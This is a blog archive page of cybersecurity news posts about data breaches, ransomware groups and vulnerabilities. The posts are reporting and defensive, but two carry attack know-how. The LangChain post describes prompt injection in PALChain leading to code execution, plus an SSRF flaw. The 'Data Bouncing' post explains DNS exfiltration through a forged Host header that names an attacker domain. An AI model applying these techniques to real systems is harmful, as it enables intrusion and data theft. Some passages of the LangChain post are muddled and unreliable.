Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Data Breach. Show all posts
User Safety
Cyber Safety Data Data Breach Data Leak Safety Security User Data User Safety

ERP Firm Data Breach Exposes Over 750 Million Records

 

A leading Enterprise Resource Planning (ERP) company based in Mexico inadvertently left an unsecured database online, exposing sensitive information on hundreds of thousands of users. This was discovered by cybersecurity researcher Jeremiah Fowler, who reported his findings to Website Planet. According to Fowler, the database contained 769 million records and was accessible to anyone who knew where to look.

The exposed data included highly sensitive and personally identifiable information such as API keys, secret keys, bank account numbers, tax identification numbers, and email addresses. The database, which is 395GB in size, belongs to ClickBalance, a software provider that offers a range of cloud-based business services including administration automation, accounting, inventory, and payroll.

Website Planet describes ClickBalance as one of Mexico’s largest ERP technology providers. Upon discovering the database, Fowler immediately contacted ClickBalance, which secured the database within hours. However, it remains unclear whether any malicious actors accessed the data before it was secured or whether the data has been used in any malicious activities. Fowler emphasizes that only a comprehensive forensic investigation can determine the full extent of the exposure.

The exposure of tax identification numbers and bank account details poses significant risks, enabling cybercriminals to conduct fraudulent activities. The theft of active email addresses is particularly concerning, as it allows criminals to launch phishing attacks that can deliver malware and ransomware.

Despite the severe potential consequences, unsecured databases continue to be a common cause of data breaches. Many large enterprises and government organizations have been found with online databases lacking adequate protection. For instance, a previous incident resulted in the personal information of the entire Brazilian population being leaked.
Read more »
Vulnerabilities and Exploits
Artificial Intelligence Cyber flaws Cyberattacks CyberCrime Cyberhackers Cybersecurity Cyberthreats Data Breach LangChain Vulnerabilities and Exploits

LangChain Gen AI Under Scrutiny Experts Discover Significant Flaws

 


Two vulnerabilities have been identified by Palo Alto Networks researchers (CVE-2023-46229 and CVE-2023-44467) that exist in LangChain, an open-source computing framework for generative artificial intelligence that is available on GitHub. The vulnerabilities that affect various products are CVE-2023-46229. It is known as the CVE-2023-46229 or Server Side Request Forgery (SSRF) bug and is an online security vulnerability that affects a wide range of products due to a vulnerability triggered in one of these products.

It should be noted that LangChain versions before 0.0.317 are particularly susceptible to this issue, with the recursive_url_loader.py module being used in the affected products. SSRF attacks can be carried out using this vulnerability, which will allow an external server to crawl and access an internal server, giving rise to SSRF attacks. It is quite clear that this possibility poses a significant risk to a company as it can open up the possibility of unauthorized access to sensitive information, compromise the integrity of internal systems, and lead to the possible disclosure of sensitive information. 

As a precautionary measure, organizations are advised to apply the latest updates and patches provided by LangChain to address and strengthen their security posture to solve the SSRF vulnerability. CVE-2023-44467 (or langchain_experimental) refers to a hypervulnerability that affects LangChain versions 0.0.306 and older. It is also known as a cyberattack vulnerability. By using import in Python code, attackers can bypass the CVE-2023-36258 fix and execute arbitrary code even though it was tested with CVE-2023. 

It should be noted that pal_chain/base.py does not prohibit exploiting this vulnerability. In terms of exploitability, the score is 3.9 out of 10, with a base severity of CRITICAL, and a base score of 9.8 out of 10. The attack has no privilege requirements, and no user interaction is required, and it can be launched from the network. It is important to note that the impact has a high level of integrity and confidentiality as well as a high level of availability. 

Organizers should start taking action as soon as possible to make sure their systems and data are protected from damage or unauthorized access by exploiting this vulnerability. LangChain versions before 0.0.317 are vulnerable to these vulnerabilities. It is recommended that users and administrators of affected versions of the affected products update their products immediately to the latest version. 

The first vulnerability, about which we have been alerted, is a critical prompt injection flaw in PALChain, a Python library that LangChain uses to generate code. The flaw has been tracked as CVE-2023-44467. Essentially, the researchers exploited this flaw by altering the functionality of two security functions within the from_math_prompt method, in which the user's query is translated into Python code capable of being run. 

The researchers used the two security functions to alter LangChain's validation checks, and it also decreased its ability to detect dangerous functions by setting the two values to false; as a result, they were able to execute the malicious code as a user-specified action on LangChain. In the time of OpenSSL, LangChain is an open-source library that is designed to make complex large language models (LLMs) easier to use. 

LangChain provides a multitude of composable building blocks, including connectors to models, integrations with third-party services, and tool interfaces usable by large language models (LLMs). Users can build chains using these components to augment LLMs with capabilities such as retrieval-augmented generation (RAG). This technique supplies additional knowledge to large language models, incorporating data from sources such as private internal documents, the latest news, or blogs. 

Application developers can leverage these components to integrate advanced LLM capabilities into their applications. Initially, during its training phase, the model relied solely on the data available at that time. However, by connecting the basic large language model to LangChain and integrating RAG, the model can now access the latest data, allowing it to provide answers based on the most current information available. 

LangChain has garnered significant popularity within the community. As of May 2024, it boasts over 81,900 stars and more than 2,550 contributors to its core repository. The platform offers numerous pre-built chains within its repository, many of which are community-contributed. Developers can directly use these chains in their applications, thus minimizing the need to construct and test their own LLM prompts. Researchers from Palo Alto Networks have identified vulnerabilities within LangChain and LangChain Experimental. 

A comprehensive analysis of these vulnerabilities is provided. LangChain’s website claims that over one million developers utilize its frameworks for LLM application development. Partner packages for LangChain include major names in the cloud, AI, databases, and other technological development sectors. Two specific vulnerabilities were identified that could have allowed attackers to execute arbitrary code and access sensitive data. 

LangChain has issued patches to address these issues. The article offers a thorough technical examination of these security flaws and guides mitigating similar threats in the future. Palo Alto Networks encourages LangChain users to download the latest version of the product to ensure that these vulnerabilities are patched. Palo Alto Networks' customers benefit from enhanced protection against attacks utilizing CVE-2023-46229 and CVE-2023-44467. 

The Next-Generation Firewall with Cloud-Delivered Security Services, including Advanced Threat Prevention, can identify and block command injection traffic. Prisma Cloud aids in protecting cloud platforms from these attacks, while Cortex XDR and XSIAM protect against post-exploitation activities through a multi-layered protection approach. Precision AI-powered products help to identify and block AI-generated attacks, preventing the acceleration of polymorphic threats. 

One vulnerability, tracked as CVE-2023-46229, affects a LangChain feature called SitemapLoader, which scrapes information from various URLs to compile it into a PDF. The vulnerability arises from SitemapLoader's capability to retrieve information from every URL it receives. A supporting utility called scrape_all gathers data from each URL without filtering or sanitizing it. This flaw could allow a malicious actor to include URLs pointing to intranet resources within the provided sitemap, potentially resulting in server-side request forgery and the unintentional leakage of sensitive data when the content from these URLs is fetched and returned. 

Researchers indicated that threat actors could exploit this flaw to extract sensitive information from limited-access application programming interfaces (APIs) of an organization or other back-end environments that the LLM interacts with. To mitigate this vulnerability, LangChain introduced a new function called extract_scheme_and_domain and an allowlist to enable users to control domains. 

Both Palo Alto Networks and LangChain urged immediate patching, particularly as companies hasten to deploy AI solutions. It remains unclear whether threat actors have exploited these flaws. LangChain did not immediately respond to requests for comment.
Read more »
Medisecurity
Cyberattacks CyberCrime Cybersecurity CyberThreat Data Breach Data Exposure Datathreat Medisecurity

Sensitive Health Data of 12.9 Million Individuals Stolen in Cyberattack

 


One data breach has led to the exposure of several personal and medical data about 12.9 million people who have become victims of cybercrime. Several customers of MediSecure, one of Australia's leading healthcare providers, have been affected by the huge data breach. There has been a breach of data relating to prescriptions distributed by the company's systems from March 2019 to November 2023 that have been exposed. 

MediSecure, a company that provides electronic prescriptions, said today that a total of 12.9 million customer records have been stolen and that an unknown amount of these records have been uploaded online. When it first learned of the data breach on April 13, when other servers holding sensitive personal and health data were discovered to be infected with suspected ransomware, the company publicly confirmed the hack in May. 

In an attack on MediSecure, which provides medical prescriptions, almost 13 million Australians were impacted by an incident where their personal and health data was breached. Based on a comprehensive investigation into the metadata accessed by its attackers in May 2024, MediSecure has uncovered that 12.9 million individuals, who used the service from March 2019 to November 2023 for the delivery of prescriptions, were affected by the breach. 

In addition to this, information regarding patient prescriptions is stored in this database. According to the authors of this evaluation, which was published on July 18, a detailed analysis of healthcare identifiers for individuals was conducted. The dataset consists of a wide variety of information related to both personal and health issues, some of which are sensitive by nature. 

Name, title, date of birth, gender, e-mail address, home address, and phone number are the personal information requested. Individual healthcare identifiers (IHI); Medicare card number; Commonwealth Seniors card number and expiration date; Healthcare Concessions card number and expiration date; Health care concessions card number and expiration date; Department of Veterans Affairs (DVA) card number and expiration date; prescription medication, including the name of the drug, the strength, the quantity, the number of repeats and the reason for the prescription. 

It has now been announced in a statement by the Department of Home Affairs that certain details about the system breach have been revealed. There have also been several links that have been provided that give victims information on how to identify scammers and protect their personal information as well as where they may find guidance. A support program is also in place to assist those who may be distressed by the nature of the attack; mental health care is also available to those affected. 

Nevertheless, it is important to emphasize that prescriptions were not affected by this change and healthcare providers were still able to prescribe and dispense medicines accordingly. There have been further breaches at another major healthcare provider, this time in the US, so the overall cost of the breach is still being calculated. A third of Americans may be impacted by the ransomware attack that took place on Change Healthcare. 

In this case, there would be 110 million individuals who would be affected by this catastrophe. There is no doubt that this attack dwarfed the Anthem attack suffered in 2015, which involved the personal records of 78.8 million people. According to The HIPAA Journal, the projected cost of addressing the cyberattack on Change Healthcare that occurred in February is estimated to be between $2.3 billion and $2.45 billion. 

This figure, however, does not account for the expenses associated with notifying all affected customers. These cyberattacks have left millions of individuals justifiably worried that their personal information may be accessible to malicious entities who could repeatedly exploit it for fraudulent purposes.

Additionally, these incidents have significantly undermined public trust in medical providers, who are entrusted with some of the most sensitive personal details. The ramifications of these breaches extend beyond financial losses, eroding confidence in the security measures of healthcare institutions tasked with safeguarding patient information.
Read more »
User Security
Data Breach Data Leak password hack Pinterest User Security

60 Million Users Exposed: The Pinterest Data Breach Explained

60 Million Users Exposed: The Pinterest Data Breach Explained

Pinterest, the popular image-sharing platform with over 518 million monthly active users, faces a potential data leak that could affect millions of users. A hacker known as “Tchao1337” has allegedly leaked a database containing 60 million rows of Pinterest user data on a popular data leak forum.

The breach details

The leaked database, which reportedly contains 6 million records, has been compressed to a file size of 1.59 gigabytes. While the full extent of the exposed information is unknown, the leaked data includes email addresses, usernames, user IDs, and IP addresses.

The first and most obvious action is changing your Pinterest password and the related email address. Knowing even a few of your details can allow hackers to piece together information and cause you major difficulties. 

Of course, you know not to use the same password for many things, right? If you are guilty of that cardinal sin, change your password everywhere and use one of the best password organizers to create a safe password that you will not forget. Use two-factor authentication to provide maximum security. 

Stay cautious: Phishing

If your data has been hacked, you are likely to become the victim of other phishing efforts. Be cautious when clicking dodgy links, and not simply in messages on your Pinterest account. 

When using your email account, use caution; any communication that does not appear to come from a known source may be a hoax. Attachments should be treated with caution since they could contain malware. 

One of the best VPNs might help you protect yourself from phishing frauds. Nord and Surfshark offer built-in anti-virus with their memberships, while Nord's Threat Protection Pro product is a proven anti-phishing champion. 

Currently, Pinterest has not issued an official statement regarding the reported hack. The Cyber Press team has contacted Pinterest to warn them of the data leak and is awaiting their response.

If proven, this data leak might have serious ramifications for Pinterest. The company may incur significant operating costs in investigating the hack and alerting affected users.

As the issue evolves, users should actively check their accounts and look for any formal statements from Pinterest regarding the potential data loss.

Be careful while sharing your data

The greatest method to avoid becoming a victim of a data breach is to use extreme caution while disclosing your personal information. Give websites only what they need; having a VPN enabled prevents many trackers and encrypts your data on both ends, preventing hackers from making sense of it. VPN services frequently have zero-logs policies, which means hackers have nothing to work with. 

Read more »
Nullbulge hack
Data Breach Data Leak Disney data leak Disney Slack breach Disney unreleased projects internal communications leak Nullbulge hack

Activist Hacking Group Claims Leak of Disney’s Internal Data

 

An activist hacking group has alleged that it leaked a substantial amount of Disney's internal communications, including details about unreleased projects, raw images, computer code, and some login credentials.

The group, known as Nullbulge, has claimed responsibility for the breach, asserting that it obtained approximately 1.2 terabytes of data from Disney’s Slack, a popular messaging platform. In an email sent to CNN on Monday, Nullbulge explained that they gained access through “a man with Slack access who had cookies.” The email also indicated that the group is based in Russia.

According to Nullbulge, the user initially attempted to remove them but allowed them to re-enter before the second breach. CNN was unable to independently verify these claims.

Disney issued a statement on Monday, acknowledging the situation and stating that it “is investigating this matter.” The company’s extensive operations span various divisions and platforms, including ESPN, Hulu, Disney+, and ABC News.

The hacking group stated their motivations included concerns about how Disney manages artist contracts and its approach to artificial intelligence (AI), along with what they described as the company's disregard for consumer interests.

Nullbulge had been teasing this major leak over recent weeks on social media. For instance, in June, they posted on X what appeared to be visitor, booking, and revenue data from Disneyland Paris.

The issue of AI has been a contentious topic in recent labor disputes, notably during the Screen Actors Guild and the Writers Guild of America strikes. Writers are worried that AI could replace them in scriptwriting, while actors fear that CGI might entirely replace their roles.

The hackers mentioned that they chose to leak the data rather than negotiate with Disney. “If we said ‘Hello Disney, we have all your Slack data,’ they would immediately lock down and attempt to neutralize us. In a confrontation, it’s better to act first,” the email stated.

This incident recalls the 2014 Sony Pictures hack, which, linked to North Korea, resulted in an international crisis by exposing company emails, celebrity aliases, social security numbers, and entire movie scripts.
Read more »
User Data
Data Breach Data Leak Ransom Stolen Data User Data

AT&T Paid Attackers $370K to Delete Stolen Customer Data

 

AT&T reportedly paid a hacker more than $370,000 to remove stolen customer data. In an extraordinary turn of events, the ransom may not have gone to those responsible for the breach.

Last Friday, AT&T disclosed that an April data breach had exposed the call and text records of "nearly all" of its customers, including phone numbers and call counts. In a filing with the Securities and Exchange Commission (SEC), AT&T claimed it has since tightened its cybersecurity measures and is working together with law authorities to investigate the incident.

It now appears that AT&T has taken additional steps in response to the intrusion. According to Wired, AT&T paid a ransom of 5.7 bitcoin to a member of the hacking group ShinyHunters in mid-May, which was worth little more than $373,000 at the time. In exchange for this money, the hacker allegedly deleted the stolen data from the cloud server where it was stored, as well as providing video footage of the act. 

However, there is no guarantee that the millions of people affected by the latest massive AT&T attack will be entirely safe, as digital data can be easily copied. The security expert who mediated negotiations between AT&T and the hacker told Wired that they believe the only complete copy of the stolen dataset was wiped. However, partial fragments may remain at large. 

Prior to AT&T's announcement of the incident, it was revealed that Santander Bank and Ticketmaster had also been penetrated using login credentials that had been taken by an employee of the independent cloud storage provider Snowflake. According to Wired, following the Ticketmaster breach, hackers may have infiltrated over 160 companies at once using a script.
Read more »
security measures
Account security AT&T Customer Data Cybersecurity measures Data Breach data security Data Theft security measures

AT&T Data Breach: Essential Steps for Victims to Protect Themselves

 

Telecom giant AT&T recently disclosed a massive data breach affecting nearly all of its approximately 110 million customers. If you were a customer between May 2022 and January 2023, there is a high chance your data, including call and text message records, was accessed through an illegal download from a third-party cloud platform. Customers should watch for contact from AT&T or check their accounts for notifications. First, change your password. 

Since your password is likely compromised, update it on both your AT&T account and any other accounts where it was used. While it’s inconvenient, using different passwords for each service is essential. Numerous tools can create secure, randomly generated passwords, and password managers can help you remember them. Also, activate two-factor authentication on your account and any other accounts using the same password. Combining two login methods enhances security. Given the nature of this leak, consider changing your cell phone number as well. Prepare for an increase in spam calls, but the bigger concern is potential scammers.

Be extra cautious about giving out personal details such as banking information or your address over the phone, as these could be cleverly disguised phishing schemes. Stay vigilant online, as even anonymous phone number information can be pieced together by scammers to identify individuals. Treat every email from unfamiliar addresses as suspicious. Additionally, inform your bank about the breach. They can monitor for any suspicious transactions and introduce new security measures to ensure you are contacting your bank, not an imposter.  

Lastly, protect yourself further by using one of the best VPNs to secure your online data. VPNs not only spoof your IP address location but also securely encrypt your data. There are even free VPN plans like ProtonVPN. Many VPNs also include antivirus elements. For instance, NordVPN has its Threat Protection Pro system, which is effective against phishing. A Surfshark One subscription includes dedicated antivirus software and an Alternative ID feature, which allows you to sign up for services online with randomly generated details, including a decoy phone number. With an Alternative ID, you can create accounts for less trustworthy services (or those frequently attacked, like AT&T) with peace of mind. 

This way, you can minimize spam and rest assured that if your details get leaked, you haven’t actually been compromised. Hackers will have nothing to piece together; you can simply disconnect that ID, generate another random identity, and move on securely.
Read more »
Obfuscation Technique
Corporate Hacking Data Breach Data Exfiltration DNS IDS Obfuscation Technique

New Hacking Method: Akami DNS Data Exfiltration



 


When it comes to cybercrime, getting into a system is only half the battle; the real challenge is extracting the stolen data without being detected. Companies often focus on preventing unauthorised access, but they must also ensure that data doesn’t slip out undetected. Hackers, driven by profit, constantly innovate methods to exfiltrate data from corporate networks, making it essential for businesses to understand and defend against these techniques.

The Challenge of Data Exfiltration

Once hackers breach a network, they need to smuggle data out without triggering alarms. Intrusion Detection Systems (IDS) are crucial in this fight. They monitor network traffic and system activities for suspicious patterns that may indicate unauthorised data extraction attempts. IDS can trigger alerts or even automatically block suspicious traffic to prevent data loss. To avoid detection, hackers use obfuscation techniques to disguise their actions. This can involve encrypting data or embedding it within harmless-looking traffic, making it difficult for IDS to identify and block the exfiltration attempts.

Reality vs. Hollywood

In Hollywood movies like "Mission Impossible," data theft is often depicted as a physical heist involving stealth and daring. In reality, hackers prefer remote methods to avoid detection and the risk of getting caught. By exploiting vulnerabilities in web servers, hackers can gain access to a network and search for valuable data. Once they find it, the challenge becomes how to exfiltrate it without triggering security systems.

One common way hackers hide their tracks is through obfuscation. A well-known method of obfuscation is image steganography, where data is embedded within images. This technique allows small amounts of data, such as passwords, to be hidden within images without raising suspicion. However, it is impractical for large datasets due to its low bandwidth and the potential for triggering alarms when numerous images are sent out.

Innovative DNS Data Exfiltration

The Domain Name System (DNS) is essential for internet functionality, translating domain names into IP addresses. Hackers can exploit this by sending data disguised as DNS queries. Typically, corporate firewalls scrutinise unfamiliar DNS requests and block those from untrusted sources. However, a novel method known as "Data Bouncing" has emerged, bypassing these restrictions and making data exfiltration easier for hackers.

How Data Bouncing Works

Data Bouncing leverages trusted web hosts to facilitate DNS resolution. Here’s how it works: hackers send an HTTP request to a reputable domain, like "bbc.co.uk," with a forged "Host" header containing the attacker’s domain. Akami Ghost HTTP servers, configured to resolve such domains, process the request, unknowingly aiding the exfiltration.

Every HTTP request a browser makes to a web server includes some metadata in the request’s headers. One of these header fields is the "Host" field, which specifies the requested domain. Normally, if you request a domain that the IP address doesn’t host, you get an error. However, Akami Ghost HTTP servers are set up to send a DNS request to resolve the domain you’ve asked for, even if it’s outside their network. This means you can send a request to a trusted domain, like "bbc.co.uk," with a "Host" header for "encryptedfilechunk.attackerdomain.com," and the trusted domain carries out the DNS resolution for you.

To prevent data exfiltration, companies need a comprehensive security strategy that includes multiple layers of defence. This makes it harder for hackers to succeed and gives security teams more time to detect and stop them. While preventing intrusions is crucial, detecting and mitigating ongoing exfiltration attempts is equally important to protect valuable data.

As cyber threats take new shapes, so must our defences. Understanding sophisticated exfiltration techniques like Data Bouncing is essential in the fight against cybercrime. By staying informed and vigilant, companies can better protect their data from falling into the wrong hands.





Read more »
tenant admins
Data Breach email notification criticism Microsoft data breach personal information compromised phishing concerns tenant admins

Microsoft Faces Criticism Over Data Breach Notification Emails

 

Microsoft recently began notifying some customers via email about a potential data breach that might have compromised their personal information. However, the company's approach has faced heavy criticism, with many saying the emails resembled spam or phishing attempts.

Cybersecurity researcher and former Microsoft employee Kevin Beaumont addressed the issue on LinkedIn, reassuring followers that the emails were legitimate, though poorly executed:

"Microsoft experienced a breach by Russia affecting customer data but did not follow the Microsoft 365 customer data breach protocol. Instead of using the portal, they emailed tenant admins," Beaumont explained. "These emails can end up in spam, and tenant admin accounts are meant to be secure, breakglass accounts without email. They also failed to notify organizations via account managers. You should review all emails dating back to June. This is a widespread issue."

One major concern noted by TechCrunch was the inclusion of a "secure link" in the emails, which directed recipients to a domain that did not seem related to Microsoft: "purviewcustomer.powerappsportals.com."

"Essentially, the critical alert looks like a phishing attack," one recipient commented on X. Many recipients shared this sentiment, as the link was submitted to urlscan.io over a hundred times. URL Scan is a service used to determine whether a website is malicious.

Additionally, Microsoft's support portal contains several posts from customers seeking confirmation of the emails' legitimacy.

"This email has several red flags for me," one person wrote. "The request for the TenantID and admin or high-level email addresses, the barebones powerapps page, and some quick Googling not yielding any related results to the email's title or contents. Can anyone confirm if this is a legitimate Microsoft email request?"
Read more »
phone surveillance
customer support tickets Data Breach mSpy spyware Personal Information phone surveillance

Data Breach Exposes Millions of mSpy Spyware Customers

 

A data breach at the phone surveillance operation mSpy has compromised the personal information of millions of customers who purchased access to the phone spyware app over the past decade, as well as the Ukrainian company behind it.

In May 2024, unknown attackers stole millions of customer support tickets, which included personal information, support emails, and attachments containing personal documents from mSpy. While hacks of spyware vendors are becoming increasingly common, they remain significant due to the highly sensitive personal data involved, including that of the service's customers.

The breach affected customer service records dating back to 2014, stolen from the spyware maker’s Zendesk-powered customer support system.

mSpy is a phone surveillance app marketed as a tool to track children or monitor employees. However, like most spyware, it is frequently used to monitor people without their consent. These apps are also known as "stalkerware" because they are often used by individuals in romantic relationships to surveil their partners without permission.

The mSpy app allows the person who installed the spyware, typically someone with prior physical access to the victim’s phone, to remotely view the phone’s contents in real-time.

As is common with phone spyware, mSpy’s customer records include emails from individuals seeking assistance to secretly track the phones of their partners, relatives, or children. TechCrunch’s review of the data, which was independently obtained, revealed that some emails and messages came from high-ranking U.S. military personnel, a serving U.S. federal appeals court judge, a U.S. government department’s watchdog, and an Arkansas county sheriff’s office requesting a free license to trial the app.

Despite the vast number of customer service tickets leaked, the data is believed to represent only a fraction of mSpy’s total customer base who contacted customer support. The actual number of mSpy customers is likely much higher.
Read more »
User Privacy
Data Breach Data Leak Tech Giant User Data User Privacy

Cyber Criminals Siphoned 'Almost All' of AT&T's Call Logs Over Six Months

 

Hackers accessed AT&T's data storage platform in April, stealing metadata from "nearly all" call records and messages sent by users over a six-month period in 2022. AT&T filed paperwork with the Securities and Exchange Commission (SEC) on Friday, stating that it learned of the incident on April 19.

The company revealed to a local media outlet that the breach took place via the third-party cloud platform Snowflake, a data storage giant plagued by hackers who have attacked some of the company's most notable clients and released stuff affecting hundreds of millions of individuals. An investigation revealed the attacker stole files from AT&T's Snowflake account between April 14 and April 25.

When asked why the attacker was still able to access the Snowflake account nearly a week after AT&T detected the issue, the spokesman stated that it "took time to investigate the claim of a breach, determine its source, isolate the impacted data, and close off the illegal access point." 

The spokesperson stated that the hackers took "aggregated metadata" regarding calls or messages, not the content of the talks. AT&T has the most wireless subscribers in the United States, far more than rivals Verizon and T-Mobile. 

According to an annual report for 2022, the incident affected around 109 million people's accounts. The telecom giant believes the hacker stole "files containing AT&T records of customer call and text interactions" from around the beginning of May 2022 to the end of October, as well as on January 2, 2023.

The hack impacted "records of calls and texts of nearly all of AT&T's wireless customers and customers of mobile virtual network operators (MVNO) using AT&T's wireless network.” 

“These records identify the telephone numbers with which an AT&T or MVNO wireless number interacted during these periods, including telephone numbers of AT&T wireline customers and customers of other carriers, counts of those interactions, and aggregate call duration for a day or month,” the company noted in the SEC filing. 

“For a subset of records, one or more cell site identification number(s) are also included. While the data does not include customer names, there are often ways, using publicly available online tools, to find the name associated with a specific telephone number.” 

AT&T pledged to tell current and former customers, and it stated it had locked down the "point of unlawful access." The company stated in the filing that at least one person was arrested in connection with the theft.
Read more »
User Privacy
Data Breach Data Leak Russian Hackers Spam Folder User Privacy

Microsoft’s Breach Notification Emails Wind Up in Spam Folder

 

Midnight Blizzard, a Russian nation-state hacker gang, breached Microsoft's security last year, gaining access to the emails of multiple customers. In late June, Microsoft revealed that more organisations were affected than previously assumed. However, the company's attempts to notify users may not have reached the intended recipients. 

According to Kevin Beaumont, a cybersecurity expert and former senior threat intelligence analyst at Microsoft, the company chose to notify affected victims via email. 

“The notifications aren’t in the portal – they emailed tenant admins instead. The emails can go into spam, and tenant admin accounts are supposed to be secure breakglass accounts without email. They also haven’t informed orgs via account managers,” Beaumont stated on LinkedIn. 

Apart from Beaumont's warnings, there is some evidence that Microsoft customers are genuinely perplexed. In a Microsoft support page, one customer revealed the email their company received in an attempt to determine whether it was a real Microsoft email. 

Others commented on Beaumont's post, alleging that several organisations misunderstood Microsoft's email for a phishing attempt and deleted it or marked it as spam. The breach notification emails allegedly lacked basic email authentication tools including SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail). 

“Well, at first glance, this did not inspire trust for the recipients, who started asking in forums or reaching out to Microsoft account managers to eventually confirm that the email was legitimate...weird way for a provider like this to communicate an important issue to potentially affected customers,” the Greece-based cybersecurity consultant noted. 

In January, Microsoft admitted that Midnight Blizzard attempted to hack the tech giant's internal systems. The same hacking group was behind the infamous SolarWinds hack, which caused havoc on US government installations in 2020.
Read more »
Sensitive data
cryptocurrency Data Breach LukaLocker ransomware Ransomware Sensitive data

Ransomware Group Uses Harassment Tactics to Secure Payments


 

A newly identified ransomware group named Volcano Demon is using aggressive tactics to compel victims to pay ransoms. Halycon, an anti-ransomware firm, recently reported that this group has targeted several organisations in the past weeks with a new encryption tool called LukaLocker.

Attack Strategy

Volcano Demon’s attack method is both simple and effective. Initially, the hackers infiltrate the target’s network, mapping it out and stealing as many sensitive files as they can. Following this, they deploy LukaLocker to encrypt files and entire systems. The victims are then instructed to pay a ransom in cryptocurrency to receive the decryption key and prevent the stolen data from being leaked.

Technical Details of LukaLocker

LukaLocker works by adding a .nba extension to encrypted files and is capable of operating on both Windows and Linux systems. The encryptor is proficient at hiding its tracks by erasing logs before exploitation, making it difficult for cybersecurity experts to perform a full forensic analysis. Furthermore, LukaLocker can disable processes linked to most major antivirus and anti-malware solutions, making recovery efforts even more challenging.

Unlike typical ransomware groups that maintain dedicated data leak sites, Volcano Demon employs a more direct and intimidating approach. They contact the leadership of the victimised companies via phone calls from unidentified numbers to negotiate ransom payments. These calls are often threatening in nature, adding psychological pressure to the already stressful situation of a ransomware attack.

Impact on Businesses

The harassment tactic used by Volcano Demon increases the urgency and stress for affected businesses. The inability to conduct thorough forensic investigations due to LukaLocker’s log-clearing capabilities leaves victims vulnerable and with limited recovery options.

Businesses must enhance their cybersecurity measures to reduce the risk of such attacks. Implementing comprehensive logging and monitoring solutions, maintaining regular backups, and educating employees about common infiltration methods like phishing are critical steps. Additionally, organisations should ensure their antivirus and anti-malware solutions are robust and regularly updated to counteract disabling mechanisms like those employed by LukaLocker.

Volcano Demon’s innovative approach to ransomware, characterised by harassing phone calls and sophisticated encryption methods, underscores the developing nature of cyber threats. As cybercriminals develop new strategies to exploit vulnerabilities, it is essential for businesses to remain vigilant and proactive in their cybersecurity efforts to protect sensitive data and ensure operational continuity.




Read more »
Ransomware
BianLian Business Continuity Data Breach Incident response Ransomware

BianLian Ransomware Strikes: US Companies Grapple with Data Breach Fallout


The BianLian ransomware organization is accused of cyberattacking against three major US companies, consisting of large amounts of sensitive data. The victims of the BianLian ransomware attack—Island Transportation Corp., Legend Properties Inc., and Transit Mutual Insurance Corporation of Wisconsin—had their breaches detailed on a dark web forum by the ransomware gang.

This escalation illustrates the growing threat ransomware attacks present against important sectors across the United States.

The Targets

1. Island Transportation Corp.: A heavyweight in the bulk carrier industry, Island Transportation Corp. services the petroleum sector. Unfortunately, they fell victim to the BianLian ransomware attack, compromising a staggering 300 GB of organizational data. Among the exposed information are vital business records, accounting files, project details, and personal data.

2. Legend Properties Inc.: As a well-established commercial real estate and brokerage firm, Legend Properties Inc. found itself in the crosshairs. The attackers gained unauthorized access to 400 GB of sensitive data, including critical business information, accounting records, and personal details.

3. Transit Mutual Insurance Corporation of Wisconsin: A key player in the insurance industry, Transit Mutual Insurance Corporation of Wisconsin suffered a similar fate. The ransomware breach exposed 400 GB of organizational data, encompassing business records, accounting files, project data, and personal information.

The Broader Implications

  • Data Privacy: The compromised data includes personal information, which could lead to identity theft or financial fraud. Companies must prioritize robust data protection mechanisms.
  • Business Continuity: Disruptions caused by ransomware attacks can cripple operations. Organizations need robust backup systems and incident response plans.
  • Industry Vulnerability: No sector is immune. Whether shipping, real estate, or insurance, all must fortify their defenses against cyber threats.

Recommendations

  • Multi-Layered Security: Companies should adopt a multi-layered security approach, including firewalls, intrusion detection systems, and regular security audits.
  • Employee Training: Educate employees about phishing, social engineering, and safe online practices. Human error remains a significant vulnerability.
  • Incident Response Plans: Develop and test incident response plans to minimize damage during an attack.

The situation underscores the growing threat posed by ransomware attacks to critical sectors across the United States. 

While Island Transportation Corp.'s website remains functional, Legend Properties Inc. and Transit Mutual Insurance Corporation of Wisconsin have displayed blocking messages, indicating potential disruptions due to the attack.

Read more »
Security
AI technology Customer Information Data Breach Data Hackers OpenAI Security

Hacker Breaches OpenAI, Steals Sensitive AI Tech Details


 

Earlier this year, a hacker successfully breached OpenAI's internal messaging systems, obtaining sensitive details about the company's AI technologies. The incident, initially kept under wraps by OpenAI, was not reported to authorities as it was not considered a threat to national security. The breach was revealed through sources cited by The New York Times, which highlighted that the hacker accessed discussions in an online forum used by OpenAI employees to discuss their latest technologies.

The breach was disclosed to OpenAI employees during an April 2023 meeting at their San Francisco office, and the board of directors was also informed. According to sources, the hacker did not penetrate the systems where OpenAI develops and stores its artificial intelligence. Consequently, OpenAI executives decided against making the breach public, as no customer or partner information was compromised.

Despite the decision to withhold the information from the public and authorities, the breach sparked concerns among some employees about the potential risks posed by foreign adversaries, particularly China, gaining access to AI technology that could threaten U.S. national security. The incident also brought to light internal disagreements over OpenAI's security measures and the broader implications of their AI technology.

In the aftermath of the breach, Leopold Aschenbrenner, a technical program manager at OpenAI, sent a memo to the company's board of directors. In his memo, Aschenbrenner criticised OpenAI's security measures, arguing that the company was not doing enough to protect its secrets from foreign adversaries. He emphasised the need for stronger security to prevent the theft of crucial AI technologies.

Aschenbrenner later claimed that he was dismissed from OpenAI in the spring for leaking information outside the company, which he argued was a politically motivated decision. He hinted at the breach during a recent podcast, but the specific details had not been previously reported.

In response to Aschenbrenner's allegations, OpenAI spokeswoman Liz Bourgeois acknowledged his contributions and concerns but refuted his claims regarding the company's security practices. Bourgeois stated that OpenAI addressed the incident and shared the details with the board before Aschenbrenner joined the company. She emphasised that Aschenbrenner's separation from the company was unrelated to the concerns he raised about security.

While the company deemed the incident not to be a national security threat, the internal debate it sparked highlights the ongoing challenges in safeguarding advanced technological developments from potential threats.


Read more »
Fintech Frenzy
Cyber Victim Cyberattacks CyberCrime Data Breach Evolve Breach Fintech Fintech Frenzy

Fintech Frenzy as Affirm and Others Emerge as Victims in Evolve Breach

 


The recent attack on one of the largest financial services providers has led to a problem for many companies that work with the provider, two of which have already alluded to possible negative implications for customer data due to the attack. There has been a strong rumour that the LockBit group successfully hacked the US Federal Reserve earlier last week, which has caused the group to receive some undue attention. A breach had also occurred at the far lesser Evolve Bank & Trust, a far less serious breach. Memphis-based Evolve has released a statement regarding the incident. 

